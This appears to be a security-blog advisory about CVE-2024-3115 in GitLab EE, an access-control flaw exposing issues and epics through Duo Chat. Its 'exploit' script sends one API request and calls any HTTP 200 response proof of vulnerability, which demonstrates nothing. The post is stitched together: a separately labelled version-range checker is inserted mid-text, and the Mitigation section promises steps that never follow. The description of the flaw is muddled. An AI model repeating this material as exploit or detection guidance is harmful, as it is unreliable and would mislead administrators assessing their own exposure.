A critical vulnerability (CVE-2024-3115) has been discovered recently in GitLab EE that could allow attackers to bypass security measures in the system and gain unauthorized access to issues and epics without a proper Single Sign-On (SSO) session created with Duo Chat. This issue affects all versions of GitLab EE from 16.0 to 16.11.5, from 17.0 to 17.0.3, and from 17.1 to 17.1.1. In this post, we will discuss the technical details of this vulnerability, its potential impacts, and how you can mitigate the issue in your GitLab installation.

Exploit Details

The vulnerability exists due to an improper access control mechanism implemented in GitLab EE for handling issues and epics. This allows an attacker to exploit the Duo Chat functionality in the application and potentially access confidential information, manipulate data, or perform unauthorized actions on behalf of a legitimate user.

The following code snippet demonstrates the exploitation of this vulnerability:

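import requests

# Base URL of the GitLab instance and a personal access token for it
target_url = "https://target.example.com/gitlab"
access_token = "your_access_token_here"

headers = {
    "Content-Type": "application/json",
    "Private-Token": access_token,
}

# Request the issues list with the Duo Chat search parameter set
response = requests.get(
    f"{target_url}/api/v4/issues?search_using_duo_chat=true",
    headers=headers,
    timeout=10,  # do not hang indefinitely on an unresponsive host
)

# The verdict is based on the HTTP status code alone
if response.status_code == 200:
    print("Vulnerable to CVE-2024-3115")
else:
    print("Not vulnerable to CVE-2024-3115")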

Replace target.example.com and your_access_token_here with the values for your own GitLab instance. The script prints its verdict based solely on the HTTP status code of the response, so confirm the result against the version your instance is actually running.
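A version comparison against the affected ranges listed at the top of this post gives a more dependable answer for an inventory of instances. The following is an added example, not code from the original post or from GitLab; the host names and versions are constructed, and it assumes the upper bound of each range is the first patched release and is therefore excluded.

```python
import re

# Affected ranges from the top of this post: (first affected, upper bound).
# Assumption: the upper bound is the first patched release, so it is excluded.
AFFECTED_RANGES = [
    ((16, 0, 0), (16, 11, 5)),
    ((17, 0, 0), (17, 0, 3)),
    ((17, 1, 0), (17, 1, 1)),
]

# Accepts "16.11.4", "16.11.4-ee", "v17.1.0-pre" and a two-part "16.0".
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """Turn a GitLab version string into a comparable (major, minor, patch)."""
    match = _VERSION_RE.match(text)
    if match is None:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(version_text):
    """True when the version falls inside one of the affected ranges."""
    version = parse_version(version_text)
    return any(low <= version < high for low, high in AFFECTED_RANGES)


def triage(inventory):
    """Map each host in {host: version} to 'affected', 'ok' or 'unknown'."""
    report = {}
    for host, version_text in inventory.items():
        try:
            report[host] = "affected" if is_affected(version_text) else "ok"
        except ValueError:
            report[host] = "unknown"  # never report an unparsable version as safe
    return report


if __name__ == "__main__":
    # Constructed inventory; host names and versions are made up for the example.
    sample = {
        "gitlab-a.example.internal": "16.11.4-ee",
        "gitlab-b.example.internal": "17.1.1-ee",
        "gitlab-c.example.internal": "n/a",
    }
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```

Feed it the version string shown on each instance's admin or help page, and treat any "unknown" result as something to check by hand.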

Mitigation

To mitigate this vulnerability, it is highly recommended to update your GitLab EE installation to the latest patched version available. Depending on the affected version, the following steps can be taken:

Conclusion

CVE-2024-3115 is a critical vulnerability found in GitLab EE that allows attackers unauthorized access to issues and epics in the system without a proper SSO session created via Duo Chat. Affected GitLab administrators should update their installations immediately to ensure their issue and epic data remains secure from potential attackers. By applying the proper patches and following GitLab's security recommendations, you can protect your users and data from this serious security flaw.

Timeline

Published on: 06/27/2024 00:15:11 UTC
Last modified on: 06/28/2024 13:22:33 UTC